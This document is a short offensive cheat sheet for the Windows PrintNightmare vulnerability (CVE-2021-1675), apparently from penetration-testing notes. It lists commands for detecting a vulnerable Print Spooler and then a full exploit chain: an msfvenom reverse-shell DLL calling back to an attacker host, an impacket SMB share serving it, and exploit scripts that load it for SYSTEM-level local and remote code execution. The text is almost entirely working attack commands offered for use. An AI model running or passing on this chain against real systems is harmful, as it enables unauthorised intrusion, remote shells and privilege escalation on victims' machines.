PrintNightmare (CVE-2021-1675)
Check if vulnerable
Print Spooler service running — Most Windows hosts are vulnerable
rpcdump.py $IP | grep -i spooler
crackmapexec smb $IP -u user -p 'password' -M printnightmare
Local Privilege Escalation
Add malicious DLL via Print Spooler — Escalate to SYSTEM
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o evil.dll
impacket-smbserver share $(pwd) -smb2support
python3 CVE-2021-1675.py domain.local/user:'password'@$IP '\\$LHOST\share\evil.dll'
Remote Code Execution
Exploit remotely via Print Spooler
python3 CVE-2021-1675.py domain.local/user:'password'@$IP '\\$LHOST\share\evil.dll'
# Or from existing shell:
.\SharpPrintNightmare.exe '\\$LHOST\share\evil.dll'